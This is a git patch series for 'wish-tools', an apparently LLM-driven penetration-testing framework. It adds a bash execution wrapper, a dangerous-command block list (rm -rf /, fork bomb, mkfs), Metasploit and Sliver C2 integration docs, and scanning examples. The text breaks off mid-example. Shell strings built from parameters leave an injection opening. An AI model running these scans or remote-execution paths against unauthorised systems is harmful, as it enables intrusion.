From 4532d127ced5b88c07bddda9bdf808fa7298a675 Mon Sep 17 00:00:00 2001 From: Sho Nakatani Date: Fri, 30 May 2025 06:27:22 +0900 Subject: [PATCH 1/4] Test pre-commit hook --- wish-tools/src/wish_tools/tools/bash.py | 258 ++++++++++++++++++++++++ 1 file changed, 258 insertions(+) create mode 100644 wish-tools/src/wish_tools/tools/bash.py diff --git a/wish-tools/src/wish_tools/tools/bash.py b/wish-tools/src/wish_tools/tools/bash.py new file mode 100644 index 0000000..afd546e --- /dev/null +++ b/wish-tools/src/wish_tools/tools/bash.py @@ -0,0 +1,258 @@ +""" +Bash tool implementation for wish framework. + +This tool provides a wrapper around bash command execution, +compatible with the existing wish-command-execution backend. +""" + +import asyncio +import subprocess +import time +from pathlib import Path +from typing import Dict, Any, Optional + +from wish_tools.framework.base import ( + BaseTool, ToolMetadata, ToolCapability, ToolContext, ToolResult, CommandInput +) + + +class BashTool(BaseTool): + """Bash shell command execution tool.""" + + def _build_metadata(self) -> ToolMetadata: + return ToolMetadata( + name="bash", + version="1.0.0", + description="Fallback shell command execution when no specialized tool is available", + author="Wish Framework Team", + category="fallback", + capabilities=[ + ToolCapability( + name="execute", + description="Execute any bash command (used when specialized tools are unavailable)", + parameters={ + "command": "The bash command to execute", + "timeout": "Timeout in seconds (optional, default: 300)", + "category": "Command category hint (optional: network, file, process, system, web, text)" + }, + examples=[ + "# Network enumeration fallback", + "nc -zv 192.168.1.1 22-443", + "ping -c 4 8.8.8.8", + "# File operations fallback", + "find /etc -name '*.conf' -type f", + "grep -r 'password' /var/log/", + "# Process management fallback", + "ps aux | grep nginx", + "netstat -tulpn | grep :80", + "# System information fallback", + "uname 
-a && cat /etc/os-release", + "df -h && free -h" + ] + ), + ToolCapability( + name="script", + description="Execute custom bash scripts for complex operations", + parameters={ + "script": "The bash script content", + "args": "Script arguments (optional)" + }, + examples=[ + "#!/bin/bash\n# Custom enumeration script\nfor port in 22 80 443; do nc -zv $1 $port; done", + "#!/bin/bash\n# Log analysis script\ngrep 'ERROR' /var/log/*.log | tail -20" + ] + ), + ToolCapability( + name="tool_combination", + description="Combine multiple tools with pipes and logic when no single specialized tool exists", + parameters={ + "command": "Complex command combining multiple tools", + "description": "Description of what the combined command does" + }, + examples=[ + "# Network discovery + service detection", + "nmap -sn 192.168.1.0/24 | grep 'Nmap scan report' | awk '{print $5}' | xargs -I {} nmap -sV -p 22,80,443 {}", + "# Log analysis with multiple filters", + "cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | sort | uniq -c | sort -nr" + ] + ) + ], + requirements=["bash"], + tags=["shell", "fallback", "general-purpose", "universal"] + ) + + async def validate_availability(self) -> tuple[bool, Optional[str]]: + """Check if bash is available.""" + try: + result = subprocess.run( + ["bash", "--version"], + capture_output=True, + text=True, + timeout=5 + ) + if result.returncode == 0: + return True, None + else: + return False, "Bash returned non-zero exit code" + except FileNotFoundError: + return False, "Bash not found in PATH" + except subprocess.TimeoutExpired: + return False, "Bash version check timed out" + except Exception as e: + return False, f"Error checking bash availability: {str(e)}" + + async def execute( + self, + command: CommandInput, + context: ToolContext, + **kwargs + ) -> ToolResult: + """Execute a bash command.""" + start_time = time.time() + + try: + # Prepare environment + env = dict(context.environment_variables) + 
env.update(kwargs.get("env", {})) + + # Create working directory if it doesn't exist + work_dir = Path(context.working_directory) + work_dir.mkdir(parents=True, exist_ok=True) + + # Run bash command + process = await asyncio.create_subprocess_shell( + command.command, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + cwd=context.working_directory, + env=env if env else None + ) + + # Set up timeout + timeout = command.timeout_sec or context.timeout_override or 300 + + try: + stdout, stderr = await asyncio.wait_for( + process.communicate(), + timeout=timeout + ) + except asyncio.TimeoutError: + process.kill() + await process.wait() + return ToolResult( + success=False, + output="", + error="Command timed out", + exit_code=124, # Standard timeout exit code + execution_time=timeout, + metadata={"timeout": True, "command": command.command} + ) + + # Decode output + output = stdout.decode('utf-8', errors='replace') if stdout else "" + error = stderr.decode('utf-8', errors='replace') if stderr else "" + + execution_time = time.time() - start_time + + return ToolResult( + success=process.returncode == 0, + output=output, + error=error if error else None, + exit_code=process.returncode or 0, + execution_time=execution_time, + metadata={ + "command": command.command, + "working_directory": context.working_directory, + "run_id": context.run_id + } + ) + + except Exception as e: + return ToolResult( + success=False, + output="", + error=f"Execution error: {str(e)}", + exit_code=-1, + execution_time=time.time() - start_time, + metadata={"command": command.command, "error_type": type(e).__name__} + ) + + def generate_command( + self, + capability: str, + parameters: Dict[str, Any], + context: Optional[ToolContext] = None + ) -> CommandInput: + """Generate a bash command for the specified capability.""" + if capability == "execute": + return CommandInput( + command=parameters["command"], + timeout_sec=parameters.get("timeout", 300) + ) + + elif capability == 
"script": + # Create a temporary script file and execute it + script_content = parameters["script"] + args = parameters.get("args", "") + + # For now, use a simple inline approach + # In production, might want to write to a temp file + escaped_script = script_content.replace("'", "'\"'\"'") + command = f"bash -c '{escaped_script}'" + if args: + command += f" {args}" + + return CommandInput( + command=command, + timeout_sec=parameters.get("timeout", 300) + ) + + elif capability == "file_ops": + operation = parameters["operation"] + + if operation == "read": + command = f"cat '{parameters['source']}'" + elif operation == "write": + content = parameters["content"] + target = parameters["target"] + # Escape content for shell + escaped_content = content.replace("'", "'\"'\"'") + command = f"echo '{escaped_content}' > '{target}'" + elif operation == "copy": + command = f"cp '{parameters['source']}' '{parameters['target']}'" + elif operation == "move": + command = f"mv '{parameters['source']}' '{parameters['target']}'" + else: + raise ValueError(f"Unknown file operation: {operation}") + + return CommandInput( + command=command, + timeout_sec=parameters.get("timeout", 60) + ) + + else: + raise ValueError(f"Unknown capability: {capability}") + + def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]: + """Validate bash command syntax and safety.""" + cmd = command.command.strip() + + # Basic safety checks + dangerous_patterns = [ + "rm -rf /", + ":(){ :|:& };:", # Fork bomb + "dd if=/dev/zero", + "mkfs.", + "fdisk", + "parted" + ] + + for pattern in dangerous_patterns: + if pattern in cmd.lower(): + return False, f"Command contains dangerous pattern: {pattern}" + + # Check for empty command + if not cmd: + return False, "Command cannot be empty" + + return True, None# Test change From 1f53205f35fa06ae6541aaaf6e8d4a1c146697a8 Mon Sep 17 00:00:00 2001 From: Sho Nakatani Date: Fri, 30 May 2025 06:38:39 +0900 Subject: [PATCH 2/4] feat: Implement wish 
tools framework with core components and tool registry - Added `wish_tools` package with an extensible framework for penetration testing workflows. - Created core framework components including `BaseTool`, `ToolContext`, `ToolMetadata`, and `ToolResult`. - Implemented `ToolRegistry` for managing tool registration, discovery, and execution. - Introduced testing utilities for validating tool implementations with `ToolTester`, `TestCase`, and various validators. - Developed initial tool implementations including `BashTool` and `MsfconsoleTool`. - Added comprehensive documentation and examples for tool usage and framework integration. - Established a testing suite for framework functionality and tool integration tests. --- docs/design.md | 182 ++++++++ wish-tools/.github/workflows/update-docs.yml | 50 +++ wish-tools/.pre-commit-config.yaml | 19 + wish-tools/Makefile | 71 ++++ wish-tools/README.md | 269 ++++++++++-- .../docs/command-generator-integration.md | 391 ++++++++++++++++++ wish-tools/docs/tools/bash.md | 99 +++++ wish-tools/docs/tools/index.md | 87 ++++ wish-tools/docs/tools/msfconsole.md | 82 ++++ wish-tools/pyproject.toml | 1 + wish-tools/scripts/generate_tool_docs.py | 282 +++++++++++++ wish-tools/scripts/test_tools.py | 280 +++++++++++++ wish-tools/scripts/tool_template.py | 136 ++++++ .../scripts/update_graph_visualization.py | 5 +- wish-tools/src/wish_tools/__init__.py | 41 ++ .../src/wish_tools/framework/__init__.py | 24 ++ wish-tools/src/wish_tools/framework/base.py | 187 +++++++++ .../src/wish_tools/framework/registry.py | 197 +++++++++ .../src/wish_tools/framework/testing.py | 276 +++++++++++++ wish-tools/src/wish_tools/tool_step_trace.py | 31 +- wish-tools/src/wish_tools/tools/__init__.py | 60 +++ wish-tools/src/wish_tools/tools/bash.py | 144 +++---- wish-tools/src/wish_tools/tools/msfconsole.py | 343 +++++++++++++++ .../tests/integrated/test_tool_step_trace.py | 26 +- wish-tools/tests/test_tools_framework.py | 296 +++++++++++++ 
wish-tools/tests/unit/test_tool_step_trace.py | 35 +- wish-tools/uv.lock | 86 ++++ 27 files changed, 3512 insertions(+), 188 deletions(-) create mode 100644 wish-tools/.github/workflows/update-docs.yml create mode 100644 wish-tools/.pre-commit-config.yaml create mode 100644 wish-tools/Makefile create mode 100644 wish-tools/docs/command-generator-integration.md create mode 100644 wish-tools/docs/tools/bash.md create mode 100644 wish-tools/docs/tools/index.md create mode 100644 wish-tools/docs/tools/msfconsole.md create mode 100644 wish-tools/scripts/generate_tool_docs.py create mode 100644 wish-tools/scripts/test_tools.py create mode 100644 wish-tools/scripts/tool_template.py create mode 100644 wish-tools/src/wish_tools/__init__.py create mode 100644 wish-tools/src/wish_tools/framework/__init__.py create mode 100644 wish-tools/src/wish_tools/framework/base.py create mode 100644 wish-tools/src/wish_tools/framework/registry.py create mode 100644 wish-tools/src/wish_tools/framework/testing.py create mode 100644 wish-tools/src/wish_tools/tools/__init__.py create mode 100644 wish-tools/src/wish_tools/tools/msfconsole.py create mode 100644 wish-tools/tests/test_tools_framework.py diff --git a/docs/design.md b/docs/design.md index 62a390a..557ed32 100644 --- a/docs/design.md +++ b/docs/design.md @@ -143,6 +143,111 @@ This separation allows each package to focus on its core functionality. 7. Status updates are tracked and displayed in the TUI 8. Results are stored in the wish history +## Detailed Command Flow + +The following flowchart shows the complete end-to-end process from user input to command execution and analysis: + +```mermaid +flowchart TB + %% User Interface Layer + subgraph TUI["🖥️ Terminal User Interface (wish-sh)"] + A[User launches wish shell] --> B[WishApp initializes] + B --> C[System Info Collection] + C --> D[WishInput Screen] + D --> E["User enters wish:
'scan all ports on target'"] + end + + %% Wish Management Layer + subgraph WM["📋 Wish Management"] + E --> F[WishManager.generate_commands] + F --> G[Create Wish object] + G --> H[CommandGenerator client] + end + + %% Command Generation API Layer + subgraph API["🤖 Command Generation API"] + H --> I[API Request with context] + I --> J[LangGraph State Machine] + + subgraph Graph["Command Generation Graph"] + J --> K[feedback_analyzer] + K --> L{Route by feedback} + L -->|First execution| M[query_processor] + L -->|Timeout error| N[timeout_handler] + L -->|Network error| O[network_error_handler] + + M --> P[command_generator] + N --> Q[command_modifier] + O --> Q + P --> Q + Q --> R[result_formatter] + end + + subgraph LLM["LLM Processing"] + P --> S["ChatGPT/OpenAI
with prompt template"] + S --> T["Generated command:
'nmap -p1-1000 $TARGET_IP'
'nmap -p1001-2000 $TARGET_IP'
..."] + end + end + + %% Command Suggestion Layer + subgraph CS["✅ Command Suggestion"] + R --> U[Return commands list] + U --> V[CommandSuggestion Screen] + V --> W["Display commands
for user approval"] + W --> X{User decision} + X -->|Yes| Y[Proceed to execution] + X -->|No| D + end + + %% Command Execution Layer + subgraph CE["⚡ Command Execution"] + Y --> Z[CommandExecutionScreen] + Z --> AA[CommandExecutor] + AA --> AB[Backend selection] + + AB --> AC{Backend type} + AC -->|Local| AD[BashBackend] + AC -->|Remote| AE[SliverBackend] + + AD --> AF[Execute via subprocess] + AE --> AG[Execute via C2] + + AF --> AH[Write stdout/stderr
to log files] + AG --> AH + end + + %% Monitoring Layer + subgraph MON["📊 Monitoring & Analysis"] + AH --> AI[CommandStatusTracker] + AI --> AJ[Monitor execution] + AJ --> AK{Command complete?} + AK -->|No| AJ + AK -->|Yes| AL[LogAnalysisClient] + AL --> AM[Analyze logs with LLM] + AM --> AN[Update command state] + AN --> AO[Update UI status] + end + + %% Completion + AO --> AP{All commands done?} + AP -->|No| AJ + AP -->|Yes| AQ[Update Wish state] + AQ --> AR[Show completion message] + AR --> AS[Return to WishInput] + AS --> D + + %% Styling + classDef userAction fill:#e1f5fe,stroke:#01579b,stroke-width:2px + classDef llmAction fill:#f3e5f5,stroke:#4a148c,stroke-width:2px + classDef systemAction fill:#e8f5e9,stroke:#1b5e20,stroke-width:2px + classDef decision fill:#fff3e0,stroke:#e65100,stroke-width:2px + + class E,W,X userAction + class S,AM llmAction + class F,G,H,I,J,K,M,N,O,P,Q,R,U,V,Y,Z,AA,AB,AD,AE,AF,AG,AH,AI,AJ,AL,AN,AO,AQ,AR systemAction + class L,X,AC,AK,AP decision +``` + ## Command Result Processing Flow ```mermaid @@ -164,3 +269,80 @@ sequenceDiagram LogAnalyzer-->>WishManager: CommandResult with log_summary and state WishManager-->>User: Display analyzed result ``` + +## Key Components and Their Roles + +### 1. **wish-sh (TUI Interface)** +- **Entry Point**: `wish.py` - Handles CLI arguments and initializes the TUI +- **Main App**: `WishApp` in `wish_tui.py` - Manages the Textual-based interface +- **Screens**: + - `WishInput`: Where users type their natural language wishes + - `CommandSuggestion`: Shows generated commands for approval + - `CommandExecutionScreen`: Displays real-time execution status + +### 2. **WishManager** +- Central orchestrator in `wish_manager.py` +- Coordinates between command generation, execution, and analysis +- Manages wish lifecycle and persistence + +### 3. 
**Command Generation API** +- **Client**: `CommandGenerationClient` sends requests to the API +- **API Handler**: Lambda function processes requests +- **LangGraph**: State machine with specialized nodes: + - `feedback_analyzer`: Handles retry logic for failed commands + - `query_processor`: Prepares the query for LLM + - `command_generator`: Uses OpenAI/ChatGPT with prompt templates + - `command_modifier`: Applies transformations (e.g., divide & conquer) + - `result_formatter`: Prepares the final command list + +### 4. **LLM Prompt Templates** +The system uses sophisticated prompts that include: +- **Context Information**: Current directory, command history +- **Guidelines**: + - Interactive command avoidance (e.g., `msfconsole -x "...exit -y"`) + - Fast alternatives (e.g., using `rg` instead of `grep`) + - Divide & conquer strategies (e.g., splitting port scans) + +### 5. **Command Execution** +- **CommandExecutor**: Manages command lifecycle +- **Backends**: + - `BashBackend`: Local execution via subprocess + - `SliverBackend`: Remote execution via C2 framework +- **Logging**: All output captured to files for analysis + +### 6. **Monitoring & Analysis** +- **CommandStatusTracker**: Polls for command completion +- **LogAnalysisClient**: Uses LLM to analyze command output +- **State Management**: Tracks success, failure, timeouts, etc. + +## Example Flow + +**User's Wish**: "scan all ports on the target machine" + +1. User types wish in TUI +2. WishManager creates Wish object with unique ID +3. CommandGenerator sends to API with system context +4. LangGraph processes through nodes: + - Query processor enhances the query + - Command generator creates base command + - Command modifier applies divide & conquer (splits into 65 parallel nmap commands) +5. User sees suggested commands and approves +6. CommandExecutor runs all commands in parallel +7. StatusTracker monitors progress +8. LogAnalysisClient analyzes results +9. UI updates with findings +10. 
User returns to wish input for next task + +## Key Design Patterns + +1. **State Machine Pattern**: LangGraph for complex command generation logic +2. **Strategy Pattern**: Multiple execution backends (Bash, Sliver) +3. **Observer Pattern**: Real-time UI updates during execution +4. **Chain of Responsibility**: Node-based processing in command generation + +## Integration Points + +- **LangSmith**: Tracing for LLM operations +- **OpenAI API**: Command generation and log analysis +- **Sliver C2**: Remote command execution +- **File System**: Log storage and analysis diff --git a/wish-tools/.github/workflows/update-docs.yml b/wish-tools/.github/workflows/update-docs.yml new file mode 100644 index 0000000..86b0541 --- /dev/null +++ b/wish-tools/.github/workflows/update-docs.yml @@ -0,0 +1,50 @@ +name: Update Tool Documentation + +on: + push: + branches: [ main, master ] + paths: + - 'src/wish_tools/tools/**/*.py' + - 'src/wish_tools/framework/**/*.py' + pull_request: + branches: [ main, master ] + paths: + - 'src/wish_tools/tools/**/*.py' + - 'src/wish_tools/framework/**/*.py' + +jobs: + update-docs: + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + + - name: Set up Python + uses: actions/setup-python@v4 + with: + python-version: '3.11' + + - name: Install uv + run: | + curl -LsSf https://astral.sh/uv/install.sh | sh + echo "$HOME/.cargo/bin" >> $GITHUB_PATH + + - name: Install dependencies + run: uv sync + + - name: Generate tool documentation + run: uv run python scripts/generate_tool_docs.py + + - name: Run tool tests + run: uv run python scripts/test_tools.py + + - name: Check for documentation changes + run: | + if [ -n "$(git diff --name-only docs/)" ]; then + echo "Documentation changes detected:" + git diff --name-only docs/ + echo "Please commit the updated documentation." + exit 1 + else + echo "Documentation is up to date." 
+ fi \ No newline at end of file diff --git a/wish-tools/.pre-commit-config.yaml b/wish-tools/.pre-commit-config.yaml new file mode 100644 index 0000000..2cf1ced --- /dev/null +++ b/wish-tools/.pre-commit-config.yaml @@ -0,0 +1,19 @@ +# Pre-commit hooks for wish-tools +repos: + - repo: local + hooks: + - id: generate-tool-docs + name: Generate tool documentation + entry: uv run python scripts/generate_tool_docs.py + language: system + files: ^src/wish_tools/tools/.*\.py$ + pass_filenames: false + always_run: false + + - id: run-tool-tests + name: Run tool tests + entry: uv run python scripts/test_tools.py + language: system + files: ^src/wish_tools/.*\.py$ + pass_filenames: false + always_run: false \ No newline at end of file diff --git a/wish-tools/Makefile b/wish-tools/Makefile new file mode 100644 index 0000000..7bca903 --- /dev/null +++ b/wish-tools/Makefile @@ -0,0 +1,71 @@ +# Makefile for wish-tools development + +.PHONY: help install test docs lint clean check-docs + +help: ## Show this help message + @echo "Available commands:" + @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | sort | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-20s\033[0m %s\n", $$1, $$2}' + +install: ## Install dependencies + uv sync + +test: ## Run all tests + uv run python -m pytest tests/ + uv run python scripts/test_tools.py + +docs: ## Generate tool documentation + uv run python scripts/generate_tool_docs.py + @echo "Documentation generated in docs/tools/" + +check-docs: ## Check if documentation is up to date + @echo "Checking if documentation is up to date..." + @uv run python scripts/generate_tool_docs.py --output-dir docs/tools-temp + @if ! diff -r docs/tools docs/tools-temp > /dev/null 2>&1; then \ + echo "❌ Documentation is out of date. 
Run 'make docs' to update."; \ + rm -rf docs/tools-temp; \ + exit 1; \ + else \ + echo "✅ Documentation is up to date."; \ + rm -rf docs/tools-temp; \ + fi + +lint: ## Run linting + uv run ruff check src/ tests/ scripts/ + uv run ruff format --check src/ tests/ scripts/ + +format: ## Format code + uv run ruff format src/ tests/ scripts/ + +clean: ## Clean up temporary files + find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true + find . -type f -name "*.pyc" -delete 2>/dev/null || true + rm -rf .pytest_cache/ + rm -rf docs/tools-temp/ + +# Development workflow targets +dev-setup: install ## Set up development environment + @echo "Installing pre-commit hooks..." + @uv run pre-commit install + @echo "✅ Pre-commit hooks installed" + +dev-check: lint test check-docs ## Run all development checks + +# Tool development workflow +add-tool: ## Add a new tool (requires TOOL_NAME) + @if [ -z "$(TOOL_NAME)" ]; then \ + echo "Usage: make add-tool TOOL_NAME=mytool"; \ + exit 1; \ + fi + @echo "Creating template for tool: $(TOOL_NAME)" + @cp scripts/tool_template.py src/wish_tools/tools/$(TOOL_NAME).py + @sed -i '' 's/TOOL_NAME/$(TOOL_NAME)/g' src/wish_tools/tools/$(TOOL_NAME).py + @echo "✅ Tool template created: src/wish_tools/tools/$(TOOL_NAME).py" + @echo "Next steps:" + @echo "1. Edit src/wish_tools/tools/$(TOOL_NAME).py" + @echo "2. Run 'make docs' to generate documentation" + @echo "3. Run 'make test' to verify implementation" + +release-check: ## Check if ready for release + @echo "🔍 Running release checks..." + @make dev-check + @echo "✅ All checks passed. Ready for release!" 
\ No newline at end of file diff --git a/wish-tools/README.md b/wish-tools/README.md index 30c04bd..b5ca576 100644 --- a/wish-tools/README.md +++ b/wish-tools/README.md @@ -1,58 +1,267 @@ -# RapidPen Tools +# Wish Tools Framework -RapidPen Toolsモジュールは、RapidPenの各モジュールで使用される共通ツールを提供するモジュールです。 +Wish Toolsは、wish フレームワーク用の拡張可能なツール抽象化フレームワークです。ペネトレーションテストツールを統一的なインターフェースで使用できるようにし、LLM による自動的なツール選択とコマンド生成を可能にします。 -## 提供ツール +## 特徴 -### Tool Step Trace +- **統一インターフェース**: 異なるツールを共通のAPIで操作 +- **自動ツール発見**: 新しいツールの自動登録 +- **LLM統合**: ツールの機能をLLMが理解できる形で提供 +- **テスト機能**: 各ツールの動作確認とテスト +- **ドキュメント生成**: ツールの使用方法を自動生成 +- **フォールバック機能**: 専用ツールがない場合のbashフォールバック -Tool Step Traceは、RapidPen-visにステップトレースを追加するためのワークフローを提供します。このツールを使用することで、ワークフローの実行状況を可視化することができます。 +## インストールと使用方法 -#### 使用方法 +### 基本的な使用方法 ```python -from rapidpen_tools.tool_step_trace import main as step_trace_main +from wish_tools.framework.registry import tool_registry +from wish_tools.framework.base import ToolContext, CommandInput -# StepTraceを呼び出し -result = step_trace_main( - run_id="実行ID", - trace_name="トレース名", - trace_message="トレースメッセージ" +# 利用可能なツールを一覧表示 +tools = tool_registry.list_tools() +for tool in tools: + print(f"{tool.name}: {tool.description}") + +# ツールを取得して実行 +tool = tool_registry.get_tool('bash') +context = ToolContext( + working_directory='/tmp', + run_id='example' ) + +# コマンドを生成 +command = tool.generate_command( + capability='execute', + parameters={ + 'command': 'nmap -sS -p 22,80,443 192.168.1.0/24', + 'category': 'network' + } +) + +# コマンドを実行 +result = await tool.execute(command, context) +print(f"Success: {result.success}") +print(f"Output: {result.output}") +``` + +### ツール機能の検索 + +```python +# カテゴリ別にツールを検索 +exploit_tools = tool_registry.list_by_category('exploitation') +fallback_tools = tool_registry.list_by_category('fallback') + +# タグで検索 +pentesting_tools = tool_registry.list_by_tag('pentesting') + +# キーワード検索 +search_results = tool_registry.search_tools('metasploit') ``` -#### パラメータ +## 利用可能なツール + 
+### 専用ツール + +#### msfconsole (Exploitation) +- **exploit**: エクスプロイト実行 +- **auxiliary**: 補助モジュール実行 +- **search**: モジュール検索 +- **info**: モジュール情報取得 + +### フォールバックツール + +#### bash (Universal Fallback) +- **execute**: 任意のシェルコマンド実行 +- **script**: カスタムスクリプト実行 +- **tool_combination**: 複数ツールの組み合わせ -- `run_id`: 実行ID(Run-プレフィックスなし) -- `trace_name`: トレース名 -- `trace_message`: トレースメッセージ +専用ツールが利用できない場合の最後の手段として使用されます。 -#### 戻り値 +## ツールの追加 + +新しいツールを追加するには、`BaseTool` を継承したクラスを作成します: ```python -{ - "status_code": 200, # HTTPステータスコード - "body": "Success" # レスポンスボディ -} +from wish_tools.framework.base import BaseTool, ToolMetadata, ToolCapability + +class MyTool(BaseTool): + def _build_metadata(self) -> ToolMetadata: + return ToolMetadata( + name="mytool", + version="1.0.0", + description="My custom tool", + author="Me", + category="custom", + capabilities=[ + ToolCapability( + name="scan", + description="Perform custom scanning", + parameters={ + "target": "Target to scan", + "options": "Scan options" + }, + examples=["mytool -t 192.168.1.1 -v"] + ) + ], + requirements=["mytool"], + tags=["custom", "scanning"] + ) + + async def validate_availability(self): + # ツールの利用可能性をチェック + return True, None + + async def execute(self, command, context): + # ツールを実行 + pass + + def generate_command(self, capability, parameters, context=None): + # LLM用のコマンド生成 + pass ``` -### Base64 Encoder +ツールは自動的に発見・登録されます。 + +## テストとドキュメント生成 + +### ツールのテスト実行 + +```bash +# 特定のツールをテスト +uv run python scripts/test_tools.py --tool bash + +# 全ツールをテスト +uv run python scripts/test_tools.py + +# テストレポートを保存 +uv run python scripts/test_tools.py --save-reports +``` + +### ドキュメント生成 + +```bash +# ツールドキュメントを生成 +uv run python scripts/generate_tool_docs.py + +# 特定の種類のドキュメントのみ生成 +uv run python scripts/generate_tool_docs.py --index --matrix +``` + +## LLM統合 + +このフレームワークは、LLMが適切なツールと機能を選択できるよう設計されています。 + +### ツール選択の優先順位 + +1. **専用ツール優先**: 可能な限り専用ツールを使用 +2. 
**bashフォールバック**: 専用ツールがない場合のみbashを使用 -Base64エンコーダーは、文字列をBase64形式にエンコードするためのツールを提供します。 +### LLM向けメタデータ -#### 使用方法 +各ツールは以下の情報をLLMに提供します: + +- **機能(Capabilities)**: ツールができること +- **パラメータ**: 各機能で必要な入力 +- **例**: 具体的な使用例 +- **要件**: システム要件 + +## アーキテクチャ + +``` +wish-tools/ +├── framework/ # コアフレームワーク +│ ├── base.py # ツールインターフェース +│ ├── registry.py # ツール登録・管理 +│ └── testing.py # テストフレームワーク +├── tools/ # ツール実装 +│ ├── bash.py # Bashツール(フォールバック) +│ └── msfconsole.py # Metasploitツール +└── scripts/ # 開発支援スクリプト + ├── test_tools.py + └── generate_tool_docs.py +``` + +## レガシーツール(後方互換性) + +以下のレガシーツールは後方互換性のため残されています: + +### Tool Step Trace ```python -from rapidpen_tools.to_base64 import main as to_base64 +from wish_tools.tool_step_trace import main as step_trace_main + +result = step_trace_main( + run_id="実行ID", + trace_name="トレース名", + trace_message="トレースメッセージ" +) +``` + +### Base64 Encoder + +```python +from wish_tools.to_base64 import main as to_base64 -# 文字列をBase64エンコード encoded = to_base64("Hello, World!") ``` -#### パラメータ +これらは将来的に新しいフレームワークインターフェースに移行予定です。 + +## 開発とコントリビューション + +### 開発環境セットアップ + +```bash +# 開発環境のセットアップ +make dev-setup + +# または手動で: +uv sync # 依存関係のインストール +uv run pre-commit install # pre-commitフックのインストール +``` + +### 開発ワークフロー + +```bash +# 新しいツールの追加 +make add-tool TOOL_NAME=mytool + +# ドキュメント生成 +make docs -- `plain`: エンコードする文字列 +# テスト実行 +make test + +# 開発チェック(リント + テスト + ドキュメント確認) +make dev-check + +# リリース前チェック +make release-check +``` + +### 自動化された品質管理 + +#### **Pre-commit Hooks** +ツールファイルを変更時に自動実行: +- ドキュメント生成 +- テスト実行 + +#### **GitHub Actions** +プルリクエスト時に自動チェック: +- ドキュメントが最新か確認 +- すべてのテストをパス +- コード品質チェック + +#### **Make タスク** +```bash +make help # 利用可能なコマンドを表示 +``` -#### 戻り値 +### コントリビューションガイドライン -Base64エンコードされた文字列 +1. 新しいツールを追加する場合は `BaseTool` を継承してください +2. 適切なテストケースを作成してください +3. ドキュメントが自動生成されることを確認してください +4. 
安全性チェック(`validate_command`)を実装してください diff --git a/wish-tools/docs/command-generator-integration.md b/wish-tools/docs/command-generator-integration.md new file mode 100644 index 0000000..6ac7eca --- /dev/null +++ b/wish-tools/docs/command-generator-integration.md @@ -0,0 +1,391 @@ +# Command Generator Integration with Tool Framework + +This document outlines how to integrate the wish-tools framework with the existing Command Generator API to enable LLM-driven tool selection and command generation. + +## Overview + +The integration transforms the command generation flow from: +``` +User Query → LLM → Shell Commands +``` + +To: +``` +User Query → LLM → Tool Selection → Capability Selection → Parameter Extraction → Command Generation +``` + +## Tool Selection Strategy + +### 1. **Priority-Based Tool Selection** + +The LLM should select tools in this priority order: + +1. **Specialized Tools First**: Use dedicated tools when available +2. **Bash as Fallback**: Use bash only when no specialized tool exists + +```python +TOOL_PRIORITY = { + "network_scanning": ["bash"], # Use bash for nmap commands + "exploitation": ["msfconsole", "bash"], + "web_requests": ["bash"], # Use bash for curl/wget commands + "file_operations": ["bash"], + "process_management": ["bash"], + "log_analysis": ["bash"] +} +``` + +### 2. 
**Intent-to-Tool Mapping** + +```python +INTENT_MAPPING = { + # Network operations - using bash for nmap commands + "port_scan": { + "primary": ("bash", "execute", {"category": "network"}), + "fallback": None + }, + "service_detection": { + "primary": ("bash", "execute", {"category": "network"}), + "fallback": None + }, + "vulnerability_scan": { + "primary": ("bash", "execute", {"category": "network"}), + "fallback": None + }, + + # Exploitation + "exploit_target": { + "primary": ("msfconsole", "exploit"), + "fallback": ("bash", "execute", {"category": "exploitation"}) + }, + "scan_vulnerabilities": { + "primary": ("msfconsole", "auxiliary"), + "fallback": ("bash", "execute", {"category": "network"}) + }, + + # General operations + "file_search": { + "primary": ("bash", "execute", {"category": "file"}), + "fallback": None + }, + "process_analysis": { + "primary": ("bash", "execute", {"category": "process"}), + "fallback": None + } +} +``` + +## LLM Prompt Template + +### Enhanced Prompt with Tool Awareness + +``` +You are a penetration testing assistant. 
You have access to the following tools: + +## Available Tools + +### msfconsole (Exploitation Framework) +**Category:** exploitation +**Description:** Metasploit Framework for exploitation and post-exploitation +**Capabilities:** +- exploit: Run exploit modules against targets + - Parameters: module (required), rhosts (required), lhost (for reverse), rport, payload, options +- auxiliary: Run auxiliary modules (scanners, fuzzers) + - Parameters: module (required), rhosts (required), rport, options +- search: Search for modules by name/CVE/platform + - Parameters: query (required), type (exploit/auxiliary/post) + +### bash (Fallback Shell) +**Category:** fallback +**Description:** Universal command execution when specialized tools unavailable +**Capabilities:** +- execute: Run any shell command + - Parameters: command (required), timeout, category (hint) +- script: Execute custom bash scripts + - Parameters: script (required), args +- tool_combination: Complex command pipelines + - Parameters: command (required), description + +## Tool Selection Rules + +1. **Always prefer specialized tools** over bash when available +2. **Use bash only as fallback** when: + - No specialized tool exists for the task + - Need to combine multiple tools with pipes/logic + - Performing basic system operations + +3. 
**Tool availability check**: Assume all tools are available unless specified otherwise + +## Response Format + +For each user request, respond with a JSON array of tool commands: + +```json +[ + { + "tool": "tool_name", + "capability": "capability_name", + "parameters": { + "param1": "value1", + "param2": "value2" + }, + "explanation": "Why this tool/capability was chosen", + "priority": 1 + } +] +``` + +## Examples + +**User:** "Scan all ports on 192.168.1.100 and detect services" + +**Response:** +```json +[ + { + "tool": "bash", + "capability": "execute", + "parameters": { + "command": "nmap -sS -p- 192.168.1.100", + "category": "network" + }, + "explanation": "Use nmap via bash for comprehensive port scanning", + "priority": 1 + }, + { + "tool": "bash", + "capability": "execute", + "parameters": { + "command": "nmap -sV 192.168.1.100", + "category": "network" + }, + "explanation": "Detect services on target host using nmap", + "priority": 2 + } +] +``` + +**User:** "Check if target is vulnerable to EternalBlue" + +**Response:** +```json +[ + { + "tool": "msfconsole", + "capability": "auxiliary", + "parameters": { + "module": "auxiliary/scanner/smb/smb_ms17_010", + "rhosts": "{{TARGET_IP}}" + }, + "explanation": "Use Metasploit auxiliary module to check EternalBlue vulnerability", + "priority": 1 + } +] +``` + +**User:** "Find all configuration files in /etc" + +**Response:** +```json +[ + { + "tool": "bash", + "capability": "execute", + "parameters": { + "command": "find /etc -name 